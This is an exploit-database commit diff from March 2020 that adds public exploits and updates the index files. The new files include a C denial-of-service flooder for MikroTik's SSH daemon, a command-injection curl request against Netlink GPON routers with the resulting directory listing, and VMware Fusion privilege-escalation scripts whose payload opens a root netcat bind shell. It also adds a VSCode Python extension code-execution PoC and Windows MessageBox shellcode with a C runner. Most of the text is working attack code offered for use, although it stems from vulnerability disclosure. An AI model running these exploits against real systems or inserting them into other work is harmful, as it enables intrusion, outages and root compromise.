DB: 2020-03-19

7 changes to exploits/shellcodes NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Microsoft VSCode Python Extension - Code Execution VMWare Fusion - Local Privilege Escalation Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) Netlink GPON Router 1.0.11 - Remote Code Execution Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
2020-03-19 05:01:49 +00:00 · 2020-03-19 05:01:49 +00:00 · 85cdf30cea
commit 85cdf30cea
parent 20e5ee2e94
9 changed files with 560 additions and 1 deletions
--- a/exploits/hardware/remote/48228.txt
+++ b/exploits/hardware/remote/48228.txt
@ -0,0 +1,103 @@
 # Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
 # Author: Hosein Askari
 # Date: 2020-03-18
 # Vendor Homepage: https://mikrotik.com/
 # Model: hAP lite
 # Processor architecture: smips
 # Affected Version: through 6.44.3
 # CVE: N/A
 #Description:
 An uncontrolled resource consumption vulnerability in SSH daemon on MikroTik routers through v6.44.3 could allow remote attackers to generate CPU activity, trigger refusal of new authorized connections with SIGPIPE signal(SIGPIPE is the "broken pipe" signal, which is sent to a process when it attempts to write to a pipe whose read end has closed or when it attempts to write to a socket that is no longer open for reading. The default action is to terminate the process) and cause a reboot via connect and write system calls because of uncontrolled resource management.
 #details:
 The issue reported in 02/25/2020 to the Mikrotik
 First response by Mikrotik in 02/26/2020
 The additional information about exploit and PoC video sent in 02/26/2020
 The vulnerability is accepted by "Reinis-Jānis S" from mikrotik security team in 02/27/2020 and asked for providing the CVE number and disclosure date
 #PoC:
 #Mitigation:
 It can be mitigated with firewall filter and service port restrictions.
 Solution:
 Hardening and tuning the daemon for these 2 parameters:
 1- Number of allowed unauthenticated connections to ssh daemon
 2- Maximum number of connections at which we start dropping everything for ssh daemon
 PoC:
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <errno.h>
 #include <netdb.h>
 #include <sys/socket.h>
 #include <sys/types.h>
 #include <signal.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>
 #define MAX_CON 32
 #define MAX_THREADS 16
 int Socket(char *ip, char *port) {
    struct addrinfo hints, *ret, *p;
    int sock, r; 
    ssize_t bytes;
    char buffer[2048];
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(ip, port, &hints, &ret))!=0) {
        return EXIT_FAILURE;
       }
    for(p = ret; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(ret)
        freeaddrinfo(ret);
    fprintf(stderr, "ESTABLISHED  %s:%s\n", ip, port);
    return sock;
 }
 void signal_callback_handler(int signum){
        printf("Caught signal SIGPIPE %d\n",signum);
 }
 void mal(char *ip, char *port, int id) {
    int sockets[MAX_CON];
    int i, g=1, r;
    for(i=0; i!= MAX_CON; i++)
        sockets[i]=0;
    signal(SIGPIPE, signal_callback_handler);
    while(1) {
        for(i=0; i!= MAX_CON; i++) {
            if(sockets[i] == 0)
                sockets[i] = Socket(ip, port);
            r=write(sockets[i], "\0", 1);
            if(r == -1) {
                close(sockets[i]);
                sockets[i] = Socket(ip, port);
            }
        }
        usleep(200000);
    }
 }
 int main(int argc, char **argv) {
    int i;
    for(i=0; i!= MAX_THREADS; i++) {
        if(fork())
            mal(argv[1], argv[2], i);
        usleep(200000);
    }
    getc(stdin);
    return 0;
 }
 #########
 Sincerely,
 Hosein Askari
--- a/exploits/hardware/webapps/48225.txt
+++ b/exploits/hardware/webapps/48225.txt
@ -0,0 +1,66 @@
 # Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution
 # Date: 2020-03-17
 # Exploit Author: shellord
 # Vendor Homepage: https://www.netlink-india.com/
 # Version: 1.0.11
 # Tested on: Windows 10
 # CVE: N/A
 Exploit :
 curl -L -d "target_addr=;ls /&waninf=1_INTERNET_R_VID_154"
 http://TARGETIP/boaform/admin/formPing
 Response :
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
 <!--ϵͳĬģ-->
 <html>
 <head>
 <title>PINGԽ</title>
 <meta http-equiv=pragma content=no-cache>
 <meta http-equiv=refresh content="2">
 <meta http-equiv=cache-control content="no-cache, must-revalidate">
 <meta http-equiv=content-type content="text/html; charset=gbk">
 <meta http-equiv=content-script-type content=text/javascript>
 <!--ϵͳcss-->
 <style type=text/css>
@import url(/style/default.css);
 </style>
 <!--ϵͳű-->
 <script language="javascript" src="common.js"></script>
 </head>
 <!-------------------------------------------------------------------------------------->
 <!--ҳ-->
 <body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"
 alink="#000000" link="#000000" vlink="#000000">
        <blockquote>
        <form>
        <div align="left" style="padding-left:20px;"><br>
        <div align="left"><b>Finish</b>
        <br><br>
        </div>
        <pre>
 bin
 dev
 etc
 home
 image
 lib
 mnt
 proc
 sbin
 sys
 tmp
 usr
 var
        </pre>
                <input type=button value="back"
 onClick=window.location.replace("/diag_ping_admin_en.asp")>
        </div>
        </form>
        </blockquote>
 </body>
 </html>
--- a/exploits/linux/webapps/48212.txt
+++ b/exploits/linux/webapps/48212.txt
@ -6,7 +6,7 @@
 # Software Link: http://centos-webpanel.com/
 # Version: v6 - v7
 # Tested on: Kali Linux - Windows 10
-# CVE : N/A
+# CVE : CVE-2020-10230
 # Type: Error Based SQL Injection
 # Payload:
--- a/exploits/macos/local/48232.md
+++ b/exploits/macos/local/48232.md
@ -0,0 +1,148 @@
 Local Privilege Escalation via VMWare Fusion
 Overview:
 A directory traversal vulnerability in VMware Fusion's SUID binaries can allow
 an attacker to run commands as the root user.
 Tested Versions:
 * VMware Fusion 10.1.3 (9472307) on macOS 10.13.6
 * VMware Fusion 11.0.0 (10120384) on macOS 10.14.1
 * VMware Fusion 11.0.2 (10952296) on macOS 10.14.1
 * VMware Fusion 11.5.0 (14634996) on macOS 10.15.1
 * VMware Fusion 11.5.1 (15018442) on macOS 10.15.1
 Exercising:
 1) Ensure the VMware Fusion services are not running. If open, quit the VMware
   Fusion GUI.
 2) Run one of the exploit script (exploit_fusion.sh or exploit_usb.sh). They
   will remain running until manually stopped via CTRL-c. The exploit will start
   a netcat listener as root on TCP port 3333.
 3) Connect to the netcat listener: nc 127.0.0.1 3333
 Details:
 This vulnerability is a directory traversal bug inside of VMware Fusion. Several
 of the programs included in VMware Fusion rely on the their path on disk to find
 other libraries, helper utilities, and service daemons. Two such instances of
 this code pattern in SUID programs can be found in the "Open VMware Fusion
 Services" executable and the "Open VMware USB Arbitrator Service" executable.
 These programs try to open the service programs by looking for the files:
 Open VMware Fusion Services:
 $DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services
 Open VMware USB Arbitrator Service:
 $DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service
 While ordinarily this is fine, as any attempt to copy the programs will not copy
 the SUID ownership of the file and any attempt to the move the programs will
 fail without root access. Furthermore symbolic links will not trick the programs
 into using the new location. However, on macOS unprivileged users can create
 hard links to SUID executables, which will trick the programs. Thus, by creating
 an adequate directory layout and hard linking to the SUID programs, we can trick
 them into running an executable of our choice as the root user. The included
 exploit_usb.sh and exploit_fusion.sh scripts setup the correct directory
 structure and hard link, compile the payload, and run the linked program in
 order to start a netcat listener as root on TCP port 3333.
 In addition to the two SUID executables listed above, the SUID executable
 "vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two
 libraries, libcrypto and libssl, from the incorrect directory. However, the two
 libraries must be signed by apple or with an apple distributed signing
 certificate from an organization containing the word "VMware". As such, this bug
 is harder to exploit in vmware-authd. Depending on how strict Apple's developer
 verification process is, it may be possible to fool Apple into granting a
 matching certificate by hiding VMware within a phrase, such as with a
 certificate for "Never Mind Where cloud services inc (NVMware Inc)".
 One limitation to this vulnerability is that these two vulnerable service
 openers will not try to open their services if the service is already running.
 Thus, the exploit will not work if the "VMware USB Arbitrator Service" and
 "VMware Fusion Services" services are already running. Thus, if the VMware
 Fusion GUI is open, this vulnerability cannot be exploited. However, closing the
 GUI will stop the services associated with the vulnerable service openers and
 make the vulnerability once again exploitable. In contrast, the library
 injection attack is not subject to these restrictions (but requires the
 appropriate certificate).
 As a side note, the vulnerable code is also used in VMware Workstation on Linux.
 However, Linux does not allow an unprivileged user to create hard links to files
 they do not own. As such, this bug is not exploitable in VMware Workstation on
 Linux.
 Timeline:
 2019.11.12 Reported to VMware
 2019.12.18 VMware confirms they can reproduce the issue
 2019.12.24 Asked for status update, were told we'd get an update in early Jan
 2020.01.08 Requested status update, were told fix scheduled for April 2020
 2020.01.15 Called VMware to discuss
 2020.01.21 Follow up meeting with VMware to discuss
 2020.03.17 VMware releases patch & public disclosure
 ## exploit_fusion.sh
 ```
 #!/bin/sh
 # Remake the necessary folder structure
 rm -rf a Contents
 mkdir -p Contents/Library/services/
 mkdir -p a/b/c/
 # Build our payload
 clang payload.c -o "Contents/Library/services/VMware Fusion Services"
 # Create a hard link to the VMware SUID opener program
 ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked
 # Run the linked program, which causes it to be confused about the path, and
 # launch our payload.  Additionally if our payload exits, VMware will relaunch
 # it
 a/b/c/linked
 ```
 ## exploit_fusion.sh EOF
 ## exploit_usb.sh
 ```
 #!/bin/sh
 # Remake the necessary folder structure
 rm -rf a Contents
 mkdir -p Contents/Library/services/
 mkdir -p a/b/c/
 # Build our payload
 clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service"
 # Create a hard link to the VMware SUID opener program
 ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked
 # Run the linked program, which causes it to be confused about the path, and
 # launch our payload.  Additionally if our payload exits, VMware will relaunch
 # it
 a/b/c/linked
 ```
 ## exploit_usb.sh EOF
 ## payload.c
 ```
 #include <stdlib.h>
 #include <unistd.h>
 int main(int argc, char**argv) {
 	setuid(0);
 	system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f");
 	return 0;
 }
 ```
 ## payload.c EOF
--- a/exploits/multiple/local/48231.md
+++ b/exploits/multiple/local/48231.md
@ -0,0 +1,16 @@
 # VSCode Python Extension Code Execution
 This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the [Visual Studio Code](https://code.visualstudio.com/) Python extension.
 >TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as formatting, autocompletion, etc. This insecure design leads to arbitrary code execution by simply cloning and opening a malicious Python repository.
 You can read more about this vulnerability on our blog: [https://blog.doyensec.com/2020/03/16/vscode_codeexec.html](https://blog.doyensec.com/2020/03/16/vscode_codeexec.html).
 ## HowTo
 - Clone the 'malicious' repository with `git clone https://github.com/doyensec/VSCode_PoC_Oct2019.git`
 - Add the cloned repo to a VSCode workspace on macOS. Note that the vulnerability affects all platforms, but the PoC is executing *Calculator.app*
 - Open `test.py` in VScode
 Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48231.zip
--- a/exploits/windows/local/48227.txt
+++ b/exploits/windows/local/48227.txt
@ -0,0 +1,35 @@
 # Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
 # Discovery by: Alan Mondragon "El Masas"
 # Discovery Date: 2020-03-17
 # Vendor Homepage: https://www.veritas.com/
 # Software Link : https://www.veritas.com/
 # Veritas
 # Tested Version: 7.0
 # Vulnerability Type: Unquoted t Service Path
 # Tested on OS: Windows Server 2008 R2 en
 # Step to discover Unquoted Service Path: 
 C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """                                                                                                                                                                                                   Auto
 NetBackup Client Service NetBackup INET Daemon
                      C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
                                                    Auto
 C:\>sc qc "NetBackup INET Daemon"
 [SC] QueryServiceConfig SUCCESS
        SERVICE_NAME: NetBackup INET Daemon                                                                                                                                                                    
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NetBackup Client Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem
 #Exploit:
 # A successful attempt would require the local user to be able to insert their code in the system root path 
 # undetected by the OS or other security applications where it could potentially be executed during 
 # application startup or reboot. If successful, the local user's code would execute with the elevated 
 # privileges of the application.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10991,6 +10991,9 @@ id,file,description,date,author,type,platform,port
 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
 48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
 48211,exploits/windows/local/48211.py,"AnyBurn 4.8 - Buffer Overflow (SEH)",2020-03-13,"Richard Davy",local,windows,
 48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
 48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18046,6 +18049,7 @@ id,file,description,date,author,type,platform,port
 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
 48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux,
 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
 48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42478,3 +42482,4 @@ id,file,description,date,author,type,platform,port
 48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -1016,3 +1016,4 @@ id,file,description,date,author,type,platform
 47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
 48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux
 48116,shellcodes/windows_x86/48116.c,"Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
 48229,shellcodes/windows/48229.txt,"Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
--- a/shellcodes/windows/48229.txt
+++ b/shellcodes/windows/48229.txt
@ -0,0 +1,185 @@
 # Shellcode Title:  Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)
 # Shellcode Author: Bobby Cooke
 # Date: March 2020-03-17
 # Tested On: 
 # Windows 10 Pro 1909 (x86): HelpPane.exe, notepad.exe, certutil.exe
 # Windows 10 Pro 1909 (x86_64): mmc.exe, xwizard.exe  
 # [!] Will only work if MessageBoxA or MessageBoxW exist in the Import Table of the Host PE
 ; Create new StackFrame
 push ebp
 mov ebp, esp
 sub esp, 0x10
 ; Dynamically find the base address of the executable image from the PEB
 ; FS_Register > TEB > PEB > &ImageBase
 xor ecx, ecx
 mul ecx                 ; Clears EAX, ECX, EDX Registers
 mov ebx, eax            ; clear EBX Register
 mov ebx, [fs:ebx+0x30]  ; get PEB address = TEB+0x30
 mov ebx, [ebx+0x8]      ; get Image Base Addr = PEB+0x8
 push ebx                ; save &ImageBase in EBX
 pop  eax                ; copy &ImageBase to EAX
 ; Get the Address of the Import Table
 ; DOS_Header > PE_Signature > ImportTable
 add eax, [ebx+0x3C]     ; EAX = &PE_Signature
 mov dl, 0x80            ; &PE_Signature+0x80 = &ImportTable_RVA
 add ax, dx              ; EAX = &ImportTable_RVA
 mov edx, [eax]          ; EDX = RVA ImportTable
 add edx, ebx            ; EDX = &ImportTable
 add dl, 0xC             ; EDX = &Name_RVA of first Imported DLL
 ; Create string 'USER32'
 mov cx, 0x3233          ; 23 : 3233
 push ecx                ; push "23, 0x0000"
 push 0x52455355         ; RESU : 52455355
 mov [ebp-0x4], esp
 ; Find the Name RVA for user32.dll within the Import Table
 ; ImportTable > ImportDirectoryTable > LoopNameRVA's
 xor ecx, ecx            ; ECX = Counter
 fUser32Name:
 push edx                ; EDX = &Name_RVA of first Imported DLL
 xor eax, eax
 mov al, 0x14            ; &Name_RVA's are every 20 bytes
 mul cl                  ; Counter * 20 bytes
 add [esp], eax
 pop eax                 ; EAX = &Name_RVA of Nth DLL
 push eax
 mov esi, [ebp-0x4]      ; ESI = &String
 mov edi, [eax]          ; EDI = RVA Name of Nth DLL
 add edi, ebx            ; EDI = &Name of Nth DLL
 push ecx                ; save counter to stack
 xor ecx, ecx
 cld                     ; clear direction flag = Process strings from left to right
 mov cl, 0x6             ; ECX = String Length
 repe cmpsb              ; compare first 6 bytes of &
 pop ecx                 ; ECX = Counter
 jz foundUser32Name      ; If string at &Name_RVA == "USER32", then end loop
 pop eax                 ; Pickup String Addr to fix stack
 inc ecx                 ;   else Counter ++
 jmp short fUser32Name   ;   restart the loop
 foundUser32Name:
 pop eax                 ; EAX = &Name_RVA of user32.dll
 mov [ebp-0x8], eax      ; [ESP-0x8] = &Name_RVA of user32.dll
 sub al, 0xC             ; EAX = &User32_ImportNameTable_RVA
 mov eax, [eax]          ; EAX = User32_ImportNameTable_RVA
 add eax, ebx            ; EAX = &User32_ImportNameTable
 mov [ebp-0xC], eax      ; [ESP-0xC] = &User32_ImportNameTable
 ; Create string 'MessageBoxA'
 mov ecx, 0x41786f6f     ; Axoo : 41786f6f
 shr ecx, 8
 push ecx                ; "oxA,0x00"
 push 0x42656761         ; Bega : 42656761
 push 0x7373654d         ; sseM : 7373654d
 jmp Counter
 MessageBoxW:
 mov byte [esp+0xA], 0x57 ; Change A to W
 mov eax, [ebp-0xC]       ; EAX = &User32_ImportNameTable
 ; Find the Name RVA for MessageBoxA within the Import Table
 ; ImportTable > ImportDirectoryTable > LoopNameRVA's
 Counter:
 xor ecx, ecx
 fNameLoop:
 mov esi, esp            ; ESI = "MessageBoxA,0x00"
 xor edx, edx
 mov edi, [eax]          ; EDI = RVA NameString
 cmp edi, edx            ; See if we checked all imported function names
 je MessageBoxW
 add edi, ebx            ; EDI = &NameString of Nth Function
 inc edi                 ; skip the first 2 bytes - Ordinal Value
 inc edi                 ; skip the first 2 bytes
 push ecx                ; push counter value
 xor ecx, ecx
 cld                     ; clear direction flag = Process strings from left to right
 mov cl, 0xB             ; ECX = String Length
 repe cmpsb              ; compare first 11 bytes
 pop ecx                 ; ECX = Counter value
 jz foundName            ; If string at &NameString == "MessageBox-", then end loop
 mov dl, 0x4
 add eax, edx            ; Next RVA NameString of Imported User32.dll function
 inc ecx                 ; Counter ++
 jmp short fNameLoop     ; restart the loop
 foundName:
 mov eax, [ebp-0x8]      ; EAX = &User32_Name_RVA
 add al, 0x4             ; EAX = &User32_ImportAddressTable_RVA
 mov edi, [eax]          ; EDI = User32_ImportAddressTable_RVA
 add edi, ebx            ; EDI = &User32_ImportNameTable
 xor eax, eax
 mov al, 0x4
 mul cx                  ; Counter * 4 = Offset MessageBoxA in Table
 add eax, edi            ;[EAX] = &MessageBoxA
 mov eax, [eax]          ; EAX = &MessageBoxA
 mov byte bl, [esp+0xA]  ; DL = 'A' or 'W'
 ;CALL to MessageBoxA
 ;  hOwner = NULL
 ;  Text = "BOKU"
 ;  Title = "BOKU"
 ;  Style = MB_OK|MB_APPLMODAL
 xor ecx, ecx        ; clear ecx register
 push ecx            ; string terminator 0x00 for string "BOKU"
 ; MessageBoxA or MessageBoxW?
 cmp bl, 0x41            ; if BL = 'A', then
 je MsgBoxA              ; push ASCII string
 ; String = "B-O-K-U-"
 push 0x2d552d4b     ; -U-K : 2d552d4b
 push 0x2d4f2d42     ; -O-B : 2d4f2d42
 mov edx, esp        ; EDX = &String
 UnicodeStrLoop:
 inc edx             ; 1st Char +1
 mov byte [edx], ch  ; Null byte after ever char in Unicode String
 inc edx             ; Every Other Char +2
 inc ecx             ; LoopCounter ++
 cmp cl, 0x4         ; If end of string, then
 je pushArgs         ; Push arguments to stack for MessageBox- Call
 jmp short UnicodeStrLoop
 MsgBoxA:
 push 0x554b4f42     ; UKOB : 554b4f42
 pushArgs:
 xor ecx, ecx
 mov ebx, esp        ; EBX = &String
 push ecx
 push ebx
 push ebx
 push ecx
 call eax            ; Call MessageBox- Function
 ############################################################################################################################
 #include <windows.h>
 #include <stdio.h>
 char code[] = \
 "\x55\x89\xe5\x83\xec\x10\x31\xc9\xf7\xe1\x89\xc3\x64\x8b\x5b\x30\x8b\x5b"
 "\x08\x53\x58\x03\x43\x3c\xb2\x80\x66\x01\xd0\x8b\x10\x01\xda\x80\xc2\x0c"
 "\x66\xb9\x33\x32\x51\x68\x55\x53\x45\x52\x89\x65\xfc\x31\xc9\x52\x31\xc0"
 "\xb0\x14\xf6\xe1\x01\x04\x24\x58\x50\x8b\x75\xfc\x8b\x38\x01\xdf\x51\x31"
 "\xc9\xfc\xb1\x06\xf3\xa6\x59\x74\x04\x58\x41\xeb\xde\x58\x89\x45\xf8\x2c"
 "\x0c\x8b\x00\x01\xd8\x89\x45\xf4\xb9\x6f\x6f\x78\x41\xc1\xe9\x08\x51\x68"
 "\x61\x67\x65\x42\x68\x4d\x65\x73\x73\xeb\x08\xc6\x44\x24\x0a\x57\x8b\x45"
 "\xf4\x31\xc9\x89\xe6\x31\xd2\x8b\x38\x39\xd7\x74\xec\x01\xdf\x47\x47\x51"
 "\x31\xc9\xfc\xb1\x0b\xf3\xa6\x59\x74\x07\xb2\x04\x01\xd0\x41\xeb\xe0\x8b"
 "\x45\xf8\x04\x04\x8b\x38\x01\xdf\x31\xc0\xb0\x04\x66\xf7\xe1\x01\xf8\x8b"
 "\x00\x8a\x5c\x24\x0a\x31\xc9\x51\x80\xfb\x41\x74\x18\x68\x4b\x2d\x55\x2d"
 "\x68\x42\x2d\x4f\x2d\x89\xe2\x42\x88\x2a\x42\x41\x80\xf9\x04\x74\x07\xeb"
 "\xf4\x68\x42\x4f\x4b\x55\x31\xc9\x89\xe3\x51\x53\x53\x51\xff\xd0";
 int main(int argc, char **argv)
 {
  int (*func)();
  func = (int(*)()) code;
  (int)(*func)();
 }